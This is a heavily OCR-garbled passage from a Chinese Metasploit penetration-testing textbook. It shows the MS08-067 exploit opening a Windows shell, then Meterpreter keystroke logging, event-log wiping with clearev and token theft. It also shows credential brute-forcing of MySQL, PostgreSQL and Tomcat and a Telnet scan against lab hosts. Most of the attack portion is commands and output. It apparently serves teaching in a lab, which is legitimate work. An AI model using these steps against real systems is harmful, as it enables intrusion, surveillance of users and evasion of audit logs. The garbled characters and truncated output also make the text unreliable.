Tunnel communication over HTTP and IPv6, Inject 


Connect back to the attacker over IPv6, Inject a 
Connect back to the attacker (No NX), Inject a 
Connect back to the attacker, Inject a DLL via a 
Connect back to the attacker, Inject a DLL via a 


Try to connect back to the attacker, on all possible 


ports (1-65535, slowly), Inject a DLL via a reflective loader 


windows/dlliniect/reverse tcp dns 
reflective loader 
windows/dns txt query exec 


record(s) and executes the returned payload 


windows/vncinjectU/reverse tcp allports 


Connect back to the attacker, Inject a DLL via a 


Performs a TXT query against a series of DNS 


Try to connect back to the attacker, on all possible 


ports (1-65535, slowly), Inject a VNC DII via a reflective loader (staged) 


windows/vncinject/reverse tcp dns 
a reflective loader (staged) 


输出 的 信息 显示 了 ms08 067_netapi 模 块 可 用 的 攻击 载荷 。 该 模块 可 以 攻击 的 载荷 


Connect back to the attacker, Inject a VNC DII via 


很 多 ， 由 于 章节 的 原因 ， 中 间 部 分 使 用 省 略 号 (......) MAT. 
(3) 这 里 选择 使 用 shell_bind/tcp 攻 击 载 何 进行 渗透 测试 。 如 下 所 示 : 


root@kali:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.41.1- 
[^] Initializing modules... 

RHOST => 192.168.41.146 

PAYLOAD => windows/shell/bind_tcp 

[^] Started bind handler 

*] Automatically detecting the target... 

*] Fingerprint: Windows XP - Service Pack © / 1 - lang:Chinese - ` 
*] Selected Target: Windows XP SPO/SP1 Universal 

*] Attempting to trigger the vulnerability... 

*] Encoded stage with x86/shikata ga nai 

*] Sending encoded stage (267 bytes) to 192.168.41.146 

*] Command shell session 1 opened (192.168.41.156:60335 -> 192.168 
icrosoft Windows XP [版 本 5.1.2600] 

(C) 版 权 所 有 1985-2001 Microsoft Corp. 

C: NWINDOWSNsystem32-» 





从 输出 的 信息 中 ， 可 以 看 到 成 功 的 从 远程 系统 上 拿 到 了 一 个 Windows 命 倒 行 的 
Shell。 这 表示 渗透 攻击 成 功 。 


6.3 控制 Meterpreter 


Meterpreter 是 Metasploit 框 架 中 的 一 个 杀手 铜 ， 通 第 作 为 利用 漏洞 后 的 攻击 载 傈 所 
使 用 ， 攻 击 载荷 在 触发 漏洞 后 能 够 返回 给 用 户 一 个 控制 通道 。 当 使 用 Armitage、 
MSFCLI 或 MSFCONSOLE 获 取 到 目标 系统 上 的 一 个 Meterpreter 连 授时 ， 用 户 必须 
使 用 Meterpreter 传 递 攻 击 载荷 。MSFCONSOLE 用 于 管理 用 户 的 会 话 ， 而 
Meterpreter 则 是 攻击 载 倚 和 渗透 攻击 交互 。 本 节 将 介绍 Meterpreter 的 使 用 。 


Meterpreter 包 括 的 一 些 常 见 命令 如 下 所 示 。 


help : 查看 帮助 信息 。 
background : 人 允许 用 户 在 后 台 Meterpreter 会 话 。 
download : 人 允许 用 户 从 人 侵 主 机 上 下 载 文 件 。 
upload : 允许 用 户 上 传 文件 到 入 侵 主机 。 
execute : 允许 用 户 在 人 侵 主 机 上 执行 命令 。 
shell : 允许 用 户 在 人 侵 主 机 上 ( 仅 是 Windows 主 机 ) 运行 Windows shell 命 
AN 
TJo 
e session -i : 人 允许 用 户 切换 会 话 。 
通过 打开 MSFCONSOLE 实 现 控 制 。 具 体操 作 步 又 如 下 所 示 。 
(1) 在 MSFCONSOLE 上 启动 一 个 活跃 的 会 话 。 


(2) 通过 利用 系统 的 用 户 启 动 登录 键 总 输入 。 执 行 合 分 如 下 所 示 : 


meterpreter > keyscan_start 
Starting the keystroke sniffer... 


Man haa PAS alse d AIRC E ho 
(3) 捕获 漏洞 系统 用 户 的 键盘 输入 。 执 行 合 分 如 下 所 示 : 
meterpreter > keyscan_dump 


Dumping captured keystrokes... 
«Return» www.baidu.com «Return» aaaa «Return» «Back» «Back» «Back» 


a] d | IÉ————— 
以 上 输出 的 信息 表示 在 漏洞 系统 中 用 户 输 入 了 www.baidu.com，aaaa 及 回 车 键 、 退 
出 键 。 

(4) 停止 捕获 漏洞 系统 用 户 的 键 盘 输入 。 执 行 命令 如 下 所 示 : 





meterpreter > keyscan_stop 
Stopping the keystroke sniffer... 


从 输出 的 信息 中 可 以 看 到 键盘 输入 串 探 已 停止 
(5) 删除 漏洞 系统 上 的 一 个 文件 。 执 行 命 令 如 下 所 示 : 


meterpreter > del exploited.docx 


(6) 清除 漏洞 系统 上 的 事件 日 志 。 执 行 命 分 如 下 所 示 : 


meterpreter > clearev 

[*] Wiping 57 records from Application... 
[^] Wiping 107 records from System... 

[*] Wiping © records from Security... 


(7) 查看 正在 运行 的 进程 列表 。 执 行 命 分 如 下 所 示 : 


meterpreter > ps 


Process List 
PID PPID Name Arch Session User Path 

0 0 [System Process] 4294967295 

4 0 System x86 0 

204 1676 notepad.exe x86 0 — AA-BBGOKJM26FSWATest CAWINDOWSA 
System32 notepad.exe 

500 672 vmtoolsd.exe x86 0 NT AUTHORITYASYSTEM C:\Program 
Files\WMware\VMware To olswmtoolsd.exe 

540 4 smss.exe x86 0 NTAUTHORITYISYSTEM, — SystemRoot 
System32ismss.exe 

576 120 conime.exe x86 0 — AA-BBGOKJM2ZG6FSWTest CAWINDOWSA 
System32\conime.exe 

604 540 csrss.exe x86 0 WNT AUTHORITTASYSTEMY? 

CAWINDOWSA system32\csrss.exe 
628 540 winlogon.exe x86 0 NT AUTHORITYYSYSTEMY?A 


CAWINDOWS! system32\winlogo n.exe 
884 31456  TPAutoConnect.exe x86 0  AA-BBG6OKJM2G6FSWATest C:\Program 
Files VMwareWMNwar e Tools\TPAutoConnect.exe 


964 Biz svchost.exe x86 0 NT AUTHORIT'^SY STEM 

1724 1544 vmtoolsd.exe x86 0 AA-8B86OKJM26FSWiTest C:\Program 

Files\VMware\VMware To olsivmtoolsd.exe 

1732 2040 notepad.exe x86 0 — AA-BBGOKJM26FSWATest 
CAWINDOWS\System32\notepad.exe 

1736 1544 ctfmon.exe x86 0 AA-BBBOKJM2ZSG6FSWATest 
CAWINDOWS\System32\ctimon.exe 

1920 964 wuauclt.exe x86 0 — AA-BBGOKJM2ZGFSWATest 


C:\WINDOWS\System32\wuauclt.exe 
AA-8860KJM26F SWiTest 

CAWINDOWS\System32\notepad.exe 
AA-BBGOKJM26FSWATest C:\Program 


1952 736 notepad.exe x86 


1956 1544  IEXPLORE.EXE x86 
Files\Internet Explorer\iexp lore.exe 
2000 1764 notepad.exe x86 


oC oo o 


AA-BBGOKJM26FSWATest 

C:\WINDOWS\System32\notepad.exe 
2040 1544  IEXPLORE.EXE x86 0 — AA-BBBOKJM26FSWATest CAProgram 
Files\Internet Exploreriexp lore.exe 


od pg ee TERRES 


(8) 使 用 kill 杀 死 漏洞 系统 中 指定 的 进程 号 。 执 行 命 合 如 下 所 示 : 


meterpreter > kill 2040 
Killing: 2040 


(9) 尝试 从 漏洞 系统 链 取 一 个 假冒 命 有 牌 。 执 行 命 爸 如 下 所 示 : 


meterpreter > steal token 


jm 注意 : 使 用 不 同 的 模块 ，Meterpreter 中 的 命令 是 不 同 的 。 有 些 模块 中 ， 可 能 
不 存在 以 上 命令。 
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前 面 依 次 介绍 了 Armitage、MSFCONSOLE 和 MSFCLI 接 口 的 概念 及 使 用 。 本 节 将 
介绍 使 用 MSFCONSOLE 工 具 渗 透 玫 击 MySQL 数据库 服务 、 PostgreSQL 数 据 库 服 
A. Tomcat 服 务 和 PDF 文件 等 。 


6.4.1 渗 鞍 攻击 MySQL 效 据 库 服务 


MySQL 是 一 个 关系 型 效 据 库 管理 系统 ， 由 到 典 MySQL AB 公 司 开发 ， 目 前 属于 
Oracle 人 公司。 在 Metasploitable 系 统 中 ，MySQL 的 身份 认证 存在 漏洞 。 该 漏洞 有 可 
能 会 让 潜在 的 攻击 者 不 必 提 供 正 确 的 身份 证 书 便 可 访问 MySQL 数 据 库 。 所 以 ， 用 户 
可 以 利用 该 漏洞 ， 对 MySQL 服 务 进 行 渗透 攻击 。 恰 好 Metasploit 框 架 提 供 了 一 套 针 
对 MySQL 数 据 库 的 辅助 模块 ， 可 以 帮助 用 户 更 有 效 的 进行 渗 秋 测试 。 本 小 节 将 介绍 
使 用 Metasploit 的 MySQL 扫 摘 模 块 渗透 攻击 MySQL 数 据 库 服务 。 渗 透 攻 击 
Metasploitable 系 统 中 MySQL 效 据 库 服务 的 具体 操作 步骤 如 下 所 示 。 


(1) 启动 MSFCONSOLE。 执行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 扫 拉 所 有 有 效 的 MySQL 模 块 。 执 行 命令 如 下 所 示 : 


msf > search mysql 
Matching Modules 


Name Disclosure Date Rank 


Authentication 00:00:00 UTC Password Reset 

auxiliary/admin/mysql/mysql_enum normal | MySQL Enumeration Module 

auxiliary/admin/mysql/mysql sql normal MySQL SQL Generic Query 

auxiliary/admin/tikiwiki/tikidblib 2006-11-01normal TikiWiki Information Disclosure 
00:00:00 UTC 

auxiliary/analyze/jtr mysql fast normal John the Ripper MySQL 

Password Cracker (Fast Mode) 

auxiliary/pro/webaudit/sgli blind timing mysql normal PRO: MySQL blind SQL 

injection module (timing) 

auxiliary/scanner/mysql/mysql authbypass 2012-06-09 normal MySQL Authentication 

Bypass 

_hashdump 00:00:00 UTC Password Dump 


auxiliary/scanner/mysql/mysql_fila_enum normal MYSQL File/Directory Enumerator 
auxiliary/scanner/mysql/mysql_hashdump normal MYSQL Password Hashdump 


auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility 
auxiliary/scanner/mysqli/mysql schemadump normal MYSQL Schema Dump 
auxiliary/scanner/mysql/mysql_ version normal MySQL Server Version Enumeration 


auxiliary/server/capture/mysql normal Authentication Capture: MySQL 
exploit/linux/mysql/mysql yass! getname 2010-01-25  goodMySQL yaSsL 
CertDecoder::GetName 

00:00:00 UTC Buffer Overflow 
exploit/linux/mysqlimysql_yass!_hello 2008-01-04 good MySQL yaSSL SSL 
Hello Message 

00:00:00 UTC Buffer Overflow 


exploit/pro/web/sqli mysql 2007-06-05 manual SQL injection exploit for 
MySQL 

00:00:00 UTC 
exploit/proweb/sqli mysql php 2000-05-30 manual SQL injection exploit for 
MySQL 

00:00:00 UTC 
exploit/unix/webapp/kimai sali 2013-05-21 average Kimai — v0.9.2 — 'db 


restore.php' SQL 

00:00:00 UTC Injection 
exploit/unix/webapp/wp google document 2013-01-03 normal WordPress Plugin 
Google Document 


_embedder_exec 00:00:00 UTC Embedder Arbitrary File 
Disclosure 

exploit/windows/mysql/mysgl mof 2012-12-01 excellent Oracle MySQL for 
Microsoft Windows 


00:00:00 UTC MOF Execution 
exploit/windows/mysql/mysgl payload 2009-01-16 ^ excellent Oracle MySQL for 
Microsoft Windows 

00:00:00 UTC Payload Execution 
exploit'windows/mysql/mysql yassl hello 2008-01-04 average MySQL  yaSSL SSL 
Hello Message 

00:00:00 UTC Buffer Overflow 


exploit/windows/mysql/scrutinizer 2012-07-27 excellent Plixer Scrutinizer 
NetFlow and sFlow 

upload exec 00:00:00 UTC Analyzer 9 Default MySQL Credential 
post/linux/gather/enum configsnormal Linux Gather Configurations 
post/linux/gather/enum users history normal Linux Gather User History 

msf > 


输出 的 信息 显示 了 MySQL 上 可 用 的 模块 。 从 这 些 模 块 中 ， 选 择 渗透 攻击 的 模块 进行 
攻击 。 


(3) 这 里 使 用 MySQL 扫 摘 模 块 。 执 行 命 分 如 下 所 示 : 


msf > use auxiliary/scanner/mysql/mysql login 
msf auxiliary(mysql login) » 
(4) XmWEGABVASUES WTA RAM : 


msf auxiliary(mysql login) > show options 
Module options (auxiliary/scanner/mysal/mysql login): 


Name Current Setting Required Description 
BLAMK PASSWORDS true no Try blank passwords for all users 
BRUTEFORCE SPEED 5 yes How fast to bruteforce, from 0 to 5 
DB ALL CREDS false no Try each user/password couple stored in the 
current database 
DB ALL PASS false no Add all passwords in the current database to the 
list 
DB ALL USERS false no Add all users in the current database to the list 
PASSWORD no A specific password to authenticate with 
PASS FILE no File containing passwords, one per line 
RHOSTS yes The target address range or CIDR identifier 
RPORT 3306 yes The target port 
STOP ON SUCCESS false yes Stop guessing when a credential works for a host 
THREADS 1 yes The number of concurrent threads 
USERNAME no A specific username to authenticate as 
USERPASS FILE no File containing users and passwords separated by 
space, one 

pair per line 

USER AS PASS true no Try the username as the password for all users 
USER FILE no File containing usernames, one per line 
VERBOSE true yes Whether to print output for all attempts 


以 上 的 信息 显示 了 在 mysql_login 模 块 下 可 设置 的 选项 。 从 输出 的 结果 中 可 以 看 到 显 
示 了 四 列 信 息 ， 分 别 是 选项 名 称 、 当 前 设置 、 需 求 及 拍 述 。 其 中 Reduired 为 yes 的 
选项 是 必须 配置 的 ， 反 之 可 以 不 用 配置 。 对 于 选项 的 作用 ，Description 都 有 相应 的 


介绍 。 


(5) 为 渗透 攻击 指定 目标 系统 、 用 户 文件 和 密码 文件 的 位 置 。 执 行 命令 如 下 所 
/小 - 


msf auxiliary(mysql login) > set RHOSTS 192.168.41.142 

RHOST => 192.168.41.142 

msf auxiliary(mysql login) > set user file /root/Desktop/usernames 
user file -» /root/Desktop/usernames.txt 

msf auxiliary(mysql login) » set pass file /root/Desktop/passwords 
pass file => /root/Desktop/passwords.txt 


Ao US  —— - 
以 上 信息 设置 了 目标 系统 的 地 址 ， 用 户 文 件 和 密码 文件 的 路 径 。 
(6) BUBBLE. WTA RB : 





msf auxiliary(mysql login) > exploit 

[deprecated] I18n.enforce available locales will default to true ir 
[^] 192.168.41.142:3306 MYSQL - Found remote MySQL version 5.0.51a 
[^] 192.168.41.142:3306 MYSQL - [01/40] - Trying username:'sa' witli 
] Access denied 

] 192.168.41.142:3306 MYSQL - [02/40] - Trying username:'root' w: 
] 192.168.41.142:3306 - SUCCESSFUL LOGIN 'root' : " 

] 192.168.41.142:3306 MYSQL - [03/40] - Trying username:'bob' wi! 
] Access denied 

] 192.168.41.142:3306 MYSQL - [04/40] - Trying username:'ftp' wi! 
] Access denied 

] 192.168.41.142:3306 MYSQL - [05/40] - Trying username:'apache' 
] Access denied 

] 192.168.41.142:3306 MYSQL - [06/40] - Trying username:'named' v 
] Access denied 

] 192.168.41.142:3306 MYSQL - [07/40] - Trying username:'sa' witl 
] Access denied 

] 192.168.41.142:3306 MYSQL - [35/40] - Trying username:'named' v 
] Access denied 

] Scanned 1 of 1 hosts (10096 complete) 

| Auxiliary module execution completed 





输出 的 信息 是 渗透 攻击 的 一 个 过 程 ， 党 试 使 用 指定 的 用 户 名 /密码 文件 中 的 用 户 名 和 
密码 连接 MySQL 服 务 器 。 在 渗透 攻击 过 程 中 ，Metasploit 会 尝试 输 入 用 户 名 和 密码 
文件 包含 的 用 户 名 和 密码 组 合 。 从 输出 的 信息 中 可 以 看 到 ， 已 测试 出 MySQL 数 据 库 
服务 器 的 用 户 名 和 密码 分 别 是 root 和 password。 


6.4.2 渗透 攻击 PostgreSQL 数 据 库 服务 


PostgreSQL 是 EA RH) . CHER 
活 的 BSD- 风 格 许可 证 下 发 行 。 当 第 一 次 启动 msfconsole 时 ，Kali 中 的 Metasploit 会 
创建 名 称 为 msf3 的 PostgreSQL 效 据 库 ， 并 生成 保存 渗 盘 测试 数据 所 需 的 数据 表 。 
然后 ， 使 用 名 称 为 msf3 的 用 户 ， 目 动 连接 到 msf3 数 据 库 。 所 以 ， 攻 击 者 可 以 利用 这 
样 的 漏洞 自动 的 连接 到 PostgreSQL 数 据 库 。 本 小 节 将 介绍 使 用 Metasploit 的 
PostgreSQL 扫 摘 模 块 渗透 攻击 PostgreSQL 数 据 库 服务 。 渗 透 攻 击 PostgreSQL 数 气 
库 服务 的 具体 操作 步骤 如 下 所 示 。 


(1) @#MSFCONSOLE, 执行 命令 如 下 所 示 : 














root@kali:~# msfconsole 


(2) 搜索 所 有 有 效 的 PostgreSQL 模 块 。 执 行 命令 如 下 所 示 : 


msf > search postgresql 
Matching Modules 


Name Disclosure Date Rank Description 

auxiliary/admin/http/rails devise pass reset 2013-01-28 normal Ruby on Rails Devise 

00:00:00 UTC Authentication 
Password Reset 
delli elisa eris normal PostgreSQL Server Generic 

uery 

auxiliary/admin/postgres/postgres sql normal PostgreSQL Server Generic 
Query 
auxiliary/scanner/postgres/postgres_ normal PostgreSQL Database Name 
dbname_flag_injection Command Line Flag Injection 
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility 
auxiliary/scanner/postgres/postgres version normal PostgreSQL Version Probe 
auxiliary/server/capture/postgresql normal Authentication Capture: 
PostgreSQL 
exploit/linux/postgres/postgres payload 2007-06-05 excelent PostgreSQL for Linux 
Payload 

00:00:00 UTC Execution 
exploil/pro/web/sgli postgres 2007-06-05 manual SQL injection exploit for 
PostgreSQL 

00:00:00 UTC 
exploit/windows/postgres/postgres payload 2009-04-10 excellent PostgreSQL for 
Microsoft Windows 

00:00:00 UTC Payload Execution 


以 上 信息 显示 了 PostgreSQL 所 有 相关 的 模块 。 此 时 可 以 选择 相应 的 模块 进行 攻 
击 。 


(3) 使 用 PostgreSQL 扫 拍 模 块 。 执 行 命令 如 下 所 示 : 


msf > use auxiliary/scanner/postgres/postgres login 


(4) 查看 PostgreSQL 模 块 的 所 有 选项 。 执 行 命 分 如 下 所 示 : 


msf auxiliary(postgres login) > show options 
Module options (auxiliary/scanner/postgres/postgres login): 


Name Current Setting Required Description 

BLANK true no Try blank passwords for all users 
PASSWORDS 
BRUTEFORCE 5 yes How fast to bruteforce, from 0 to 5 
SPEED 
DATABASE template 1 yes The database to authenticate against 
DB ALL CREDS false no Try each user/password couple stored 
in the current database 
DB ALL PASS false no Add all passwords in the current 
database to the list 
DB ALL USERS false no Add all users in the current database to 
the list 
PASSWORD no A specific password to authenticate 
with 
PASS FILE !opt/metasploit/apps/pro/msf3/data/wordlists/postgres default pass.txt 

no File containing passwords, one per line 
RETURN ROWSET true no Set to true to see query result sets 
RHOSTS yes The target address range or CIDR 
identifier 
RPORT 5432 yes The target port 
STOP_ON_ false yes Stop guessing when a credential works 
for a host 
SUCCESS 
THREADS 1 yes The number of concurrent threads 
USERNAME postgres no A specific username to authenticate as 
USERPASS FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt 

no File containing (space-seperated) users 
and 

passwords, one pair per line 

USER AS PASS true no Try the username as the password for 
all users 
USER FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres default user.txt 

no File containing users, one per line 
VERBOSE true yes Whether to print output for all attempts 


以 上 信息 显示 了 postgres_login 模 块 中 可 配置 的 选项 。 根 据 用 户 的 攻击 情况 ， 选 择 
相应 选项 进行 配置 。 


(5) 使 用 RHOST 选 项 设置 目标 系统 (AGIA 2; Metasploitable 2) 。 执 行 命 爷 如 下 
AAR : 


msf auxiliary(postgres_login) > set RHOSTS 192.168.41.142 
RHOST => 192.168.41.142 


(6) 指定 用 户 名 文件 。 执 行 命 分 如 下 所 示 : 


msf auxiliary(postgres_login) > set user file /usr/share/metasploi! 
user file => /usr/share/metasploit-framework/data/wordlists /postgi 


(7) 指定 密码 文件 。 执 行 命 分 如 下 所 示 : 





msf auxiliary(postgres login) > set pass file /usr/share/metasploi! 
pass file => /usr/share/metasploit-framework/data/wordlists/ postgi 





(8) 运行 


Tz 参透 攻击 。 执行 


Tip 


作 如 下 所 示 : 


msf auxiliary(postgres_login) > exploit 


[*] 192.168.41.142:5432 Postgres - 
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Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 


] 192.168.41.142:5432 Postgres 
192. 
192. 
192. 
192. 


Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 
Postgres 


[18/21] 


hosts (100% complete) 


[01/21] - Trying username: 'pos! 
Invalid username or password: '| 
[01/21] - Username/Password fai. 
[02/21] - Trying username:" witl 
Invalid username or password: " 
[02/21] - Username/Password fai. 
[03/21] - Trying username: ‘scott 
Invalid username or password: ': 
[03/21] - Username/Password fai. 
[04/21] - Trying username: ‘admit 
Invalid username or password: 'é 
[04/21] - Username/Password fai. 
[05/21] - Trying username: 'post¢ 
Logged in to 'template1' with 'ł 
Success: postgres:postgres (Dat: 
Disconnected 
[06/21] - Trying username: ‘scott 
Invalid username or password: ': 
[06/21] - Username/Password fai. 
[07/21] - Trying username: 'admir 

- Invalid username or password: 
[16/21] - Username/Password fai. 
[17/21] - Trying username: ‘admit 
Invalid username or password: '« 
[17/21] - Username/Password fai. 
[18/21] - Trying username: ‘admit 
Invalid username or password: '« 


- Username/Password fai. 





以 上 输出 的 信息 是 PostgreSQL 渗 透 攻 击 的 一 


个 过 程 。 测 试 到 PostgreSQL 数 据 库 服 


务 的 用 户 名 和 密码 分 别 是 Postgres 和 Postgres. 


6.4.3 渗透 攻击 Tomcat 服 务 
Tomcathk 44872 — ^l $8 # 的 开放 源 代码 的 Web 户 用 服务 器 。 它 可 以 运行 在 Linux 和 


Windows FZ DFAE., 由 于 其 


{性 能 稳定 、 扩 展 性 好 和 免费 等 特点 深 受 广大 用 户 的 
喜爱 。 目 前 ， 互 联网 上 绝 大 多 数 Java Web 等 应 用 都 运行 在 Tomcat 服 务 器 上 。 


Tomcat 黑 认 存 在 一 个 守 理 后 台 ， 黑 认 的 管理 地 址 是 http: 川 P 或 域名 :天 

口 /managerhtml。 通 过 此 后 台 ， 可 以 在 不 重启 Tomcat 服 务 的 情况 下 方便 地 部 署 、 
启动 、 停 止 或 外 载 Web 应 用 。 但 是 如 果 配 置 不 当 的 话 就 存在 很 大 的 安全 隐患 。 攻 击 
者 利用 这 个 漏洞 ， 可 以 非常 快速 、 轻 松 地 和 人 侵 一 台 服 务 器 。 本 小 节 将 介绍 渗透 攻击 
Tomcat 服 务 的 方法 。 渗 透 攻 击 Tomcat 服 务 的 具体 操作 步骤 如 下 所 示 。 


(1) B#MSFCONSOLE, 执行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 搜索 所 有 有 效 的 Tomcat 模 块 。 执 行 命令 如 下 所 示 : 


msf > search tomcat 
Matching Modules 


Name Disclosure Date Rank Description 
auxiliary/admin/http/tomcat administratio normal | Tomcat Administration Tool 
Default Access 
auxiliary/admin/http/tomcat utf8 normal Tomcat UTF-8 Directory Traversal 
Vulnerability 
traversal 
auxiliary/admin/http/trendmicro dlp - normal TrendMicro Data Loss Prevention 
5.5 Directory 
traversal Traversal 
auxiliary/dos/http/apache _ 2010-07-09 normal Apache Tomcat 
Transfer-Encoding Information 
tomcat transfer encoding 00:00:00 UTC Disclosure and DoS 
auxiliary/dos/http/hashcollision dos 2011-12-28 ^ normal Hashtable Collisions 

00:00:00 UTC 
auxiliary/scanner/http/toamcat enum normal Apache Tomcat User Enumeration 
auxiliary/scanner/http/tomcat mgr - normal Tomcat Application Manager 
Login Utility 
login 
exploit/multi/http/struts_default_ 2013-07-02 excellent Apache Struts 2 
DefaultActionMapper Prefixes 
action mapper 00:00:00 UTC OGNL Code Execution 
exploit/multi/http/tomcat mgr - 2009-11-09 excellent Apache Tomcat Manager 
Application Deployer 
deploy 00:00:00 UTC Authenticated Code Execution 
post/windows/gather/enum tomcat normal Windows Gather Apache Tomcat 
Enumeration 


以 上 输出 的 信息 显示 了 Tomcat 服 务 的 可 用 模块 。 现 在 用 户 可 以 选择 易 攻 击 的 模块 ， 
进行 渗 其 攻击 。 


(3) 使 用 Tomcat 管 理 登录 模块 进行 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf auxiliary(postgres_login) > use auxiliary/scanner/http/ tomcat 











El 


(4) 查看 tomcat mgr_login 模 块 的 有 效 选项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(tomcat mgr login) > show options 
Module options (auxiliary/scanner/http'tomcat mgr login): 


Name Current Setting Required Description 
BLANK PASSWORDS true no Try blank passwords for all users 
BRUTEFORCE SPEED 5 yes How fast to bruteforce, from 0 to 5 
DB ALL CREDS false no Try each user/password couple stored in the 
current 
database 
DB ALL PASS false no Add all passwords in the current database to 
the list 
DB ALL USERS false no Add all users in the current database to the 
list 
PASSWORD no A specific password to authenticate with 
PASS_FILE 
'opt/imetasploit/apps/pro/msf3/data/wordlists/tomcat mgr default pass.txt 

no File containing passwords, one per line 
Proxies no Use a proxy chain 
RHOSTS yes The target address range or CIDR identifier 
RPORT 8080 yes The target port 
STOP ON SUCCESS false yes Stop guessing when a credential works for a 
host 
THREADS 1 yes The number of concurrent threads 
URI /manager/htm| 

yes URI for Manager login. Default is 
Imanager/html 
USERNAME no A specific username to authenticate as 


USERPASS FILE 
!opt/metasploit/apps/pro/msf3/data/wordlists/tomcat mgr default userpass.txt 
no File containing users and passwords 
separated by space, 
one pair per line 


USER_AS PASS true no Try the username as the password for a 
users 
USER FILE 
!opt/metasploit/apps/pro/msf3/data/wordlists/tomcat mgr default users.txt 
no File containing users, one per line 
VERBOSE true yes Whether to print output for all attempts 
VHOST no HTTP server virtual host 


以 上 输出 的 信息 显示 了 tomcat mgr. login 模块 中 有 效 的 选项 。 此 时 用 户 可 以 选择 相 
应 的 模块 ， 进 行 配 置 。 


(5) 设置 Pass File 选 项。 执行 命令 如 下 所 示 : 


msf auxiliary(tomcat_mgr_login) > set PASS FILE /usr/share/metaspl: 
PASS FILE => /usr/share/metasploit-framework/data/wordlists/ tomca! 


a] S | ne 
以 上 输出 的 信息 显示 了 指定 密码 文件 的 绝对 路 径 。 
(6) 设置 User _ File 选项 。 执 行 命 分 如 下 所 示 : 





msf auxiliary(tomcat_mgr_login) > set USER FILE /usr/share/metaspl¢ 
USER FILE => /usr/share/metasploit-framework/data/wordlists/ tomcat 


以 上 输出 的 信息 显示 了 指定 用 户 名 文件 的 决定 路 径 。 





(7) 使 用 RHOSTS 选 


作 如 下 所 示 : 


项 


LIEB 


目标 系统 〈 本 例 使 用 的 是 Metasploitable 2) 。 执 行 命 


msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.41.142 


RHOSTS 


输出 的 信息 表示 


=> 192.168.41.142 


目 定 攻击 的 目标 系统 地 址 为 192.168.41.142。 


(8) 设置 RPORT 选 


项 为 8180。 执行 命 全 


人 如 下 所 示 : 


msf auxiliary(tomcat_mgr_login) > set RPORT 8180 


RPORT 


以 上 信息 7 ik E 


下 所 示 : 


192. 
192. 
192. 
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http://192. 
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Scanned 1 of 1 
Auxiliary module execution completed 
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=> 8180 


» exploit 
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168 


142: 
142: 
142: 
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8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 
8180 


8180 TOMCAT_MGR - 
8180 TOMCAT_MGR - 
8180 TOMCAT_MGR - 
:8180 TOMCAT MGR - 


置 了 攻击 目标 系统 的 靖 口 号 为 8180。 


TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 
TOMCAT_MGR 


TOMCAT_MGR - 


[01/63] 
[01/63] 
[02/63] 
[02/63] 
[12/63] 
[12/63] 
[13/63] 
[13/63] 
[14/63] 
[14/63] 
[15/63] 
[15/63] 
[16/63] 
[16/63] 
[17/63] 


[18/63] 
[18/63] 
[58/63] 
[58/63] 


hosts (100% complete) 


- Trying username: 


- Trying username: 
- /manager/html [Apacl 
- Trying username: 
- /manager/html [Apacl 


Trying username:" w: 
/manager/html [Apact 
Trying username:'adr 
/manager/html [Apact 
Trying username: ' xar 
/manager/html [Apact 
Trying username: 'adr 
/manager/html Apac] 
Trying username: 'mar 
/manager/html Apaci 
Trying username: 'ro. 
/manager/html [Apact 
Trying username: 'roc¢ 
/manager/html [Apact 
‘tor 


' bof 


' bof 





以 上 输出 信息 显示 了 攻击 Tomcat 服 务 的 一 
Tomcat 服 务 的 用 户 名 ee 


6.4.4 渗透 攻击 Telnet 服 务 


过 程 。 从 输出 的 结果 中 可 以 看 到 登录 


TelnetBl 4 z& — TR Em Pimi RAA A4, EA Telnet 17 B97jt E A 44 FH — 3E E31 r8 
个 组 件 ， 分 别 是 Telnet 服 务 器 和 Telnet 客 户 痕 。 由 于 Telnet 是 使 用 明文 的 方式 传输 数 
据 的 ， 所 以 并 不 安全 。 这 里 就 可 以 使 用 Metasplolit 中 的 一 个 模块 ， 可 以 破解 出 
Telnet 服 务 的 用 户 名 和 密码 。 下 面料 介绍 渗透 攻击 Telnet 服 务 。 


(1) 启动 MSF 终 问 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# msfconsole 
msf> 


(2) 使 用 telnet _version 模 块 ， 并 查看 可 配置 的 选项 参数 。 执 行 命 令 如 下 所 示 : 


msf > use auxiliary/scanner/telnet/telnet version 
msf auxiliary(telnet version) > show options 
Module options (auxiliary/scanner/telnet/telnet version): 


Name Current Setting Required Description 

PASSWORD no The password for the specified username 
RHOSTS yes The target address range or CIDR identifier 
RPORT 23 yes The target port 

THREADS 1 yes The number of concurrent threads 
TIMEOUT 30 yes Timeout for the Telnet probe 

USERNAME no The username to authenticate as 


eee - 
(3) 配置 RHOSTS 选 项 ， 并 和 启动 扫 摘 。 执 行 命令 如 下 所 示 : 


msf auxiliary(telnet version) > set RHOSTS 192.168.6.105 

RHOSTS => 192.168.6.105 

msf auxiliary(telnet version) > exploit 
[*] 192.168.6.105:23 TELNET _ 


\x0a shoal OL Le (Neal es 
LIES Oe L'AMA) Moal dy Tn DIE Ll 
\x0al_| T LI n sud AA LRA || Oa 


\xDalxDalxQaWarning: Never expose this VM to 
an untrusted network!\xOa\xOaContact: ^ msfdev[at]metasploit.com\xOa\xOaLogin with 
msfadmin/msfadmin to get started\x0a\x0a\xOametasploitable login: 

[+] Scanned 1 of 1 hosts (100% complete) 
